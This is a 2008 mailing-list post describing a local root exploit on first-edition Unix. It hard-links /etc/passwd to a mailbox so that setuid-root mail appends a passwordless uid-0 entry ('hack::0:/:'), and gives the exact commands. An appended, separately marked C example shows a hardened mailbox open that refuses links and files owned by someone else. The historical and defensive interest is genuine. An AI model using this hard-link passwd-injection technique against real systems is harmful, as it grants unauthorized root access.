[Unix-jun72] Some fun with 1st ed

Tim Newsham newsham at lava.net
Sun May 4 05:20:13 AEST 2008

All work and no play...

Here's a fun hack for first edition unix.  From MAIL (I) :

   When followed by the names of a letter and one or more people, the
   letter is appended to each person's mailbox.  Each letter is
   preceded by the sender's name and a postmark.

   A person is either the name of an entry in the directory /usr, in
   which case the mail is sent to /usr/person/mailbox, or the path
   of a directory, in which case mailbox in that directory is used.

Mail is setuid root:

# ls -l /bin/mail
  80 surwr-  1 root   3940 Jan  1 00:00:00 mail

Log in as a non-root user (i.e. "bin"), and create a file "letter" with the
contents "hack::0:/:".  Run:

    @ ln /etc/passwd /tmp/mailbox
    @ mail letter /tmp

Log out and log back in as "hack".  You are now root.  Cat /etc/passwd
and notice:

   From bin Jan  1 00:49:22

Clean up the file a little and enjoy your new elevated status.
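
Added example, not part of the original message and not first edition code: the check whose absence the message relies on, written for a modern POSIX system. A privileged delivery program opens the mailbox without following symlinks, then inspects the open descriptor and refuses any file that has more than one name or does not belong to the recipient. The names open_mailbox and demo, and the scratch files, are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open <dir>/mailbox for appending on behalf of `owner`.
 * Returns an fd, or -1 if the file could be another name for something else. */
int open_mailbox(const char *dir, uid_t owner)
{
    char path[4096];
    struct stat st;
    if (snprintf(path, sizeof path, "%s/mailbox", dir) >= (int)sizeof path)
        return -1;
    /* O_NOFOLLOW refuses a symlink; O_NONBLOCK avoids hanging on a FIFO. */
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    /* Check the open descriptor, not the path, so the file cannot be swapped. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 ||      /* a second name means a hard link */
        st.st_uid != owner) {    /* the mailbox must belong to the recipient */
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario in a scratch directory; "target" stands in for a
 * sensitive file. Returns 1 if the linked mailbox is refused and a private
 * mailbox is accepted. */
int demo(void)
{
    char dir[] = "/tmp/mboxdemoXXXXXX", target[64], mbox[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(mbox, sizeof mbox, "%s/mailbox", dir);
    close(open(target, O_WRONLY | O_CREAT | O_EXCL, 0600));
    if (link(target, mbox) != 0) return 0;
    int linked = open_mailbox(dir, geteuid());   /* refused: -1 */
    unlink(mbox);
    close(open(mbox, O_WRONLY | O_CREAT | O_EXCL, 0600));
    int fd = open_mailbox(dir, geteuid());       /* accepted: fd >= 0 */
    if (fd >= 0) close(fd);
    unlink(mbox); unlink(target); rmdir(dir);
    return linked == -1 && fd >= 0;
}

int main(void) { printf("demo: %s\n", demo() ? "ok" : "FAILED"); return 0; }
```

In the demo both files belong to the calling user, so it is the link-count test that rejects the aliased mailbox; on a real system the ownership test would also reject a root-owned file offered as another user's mailbox.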

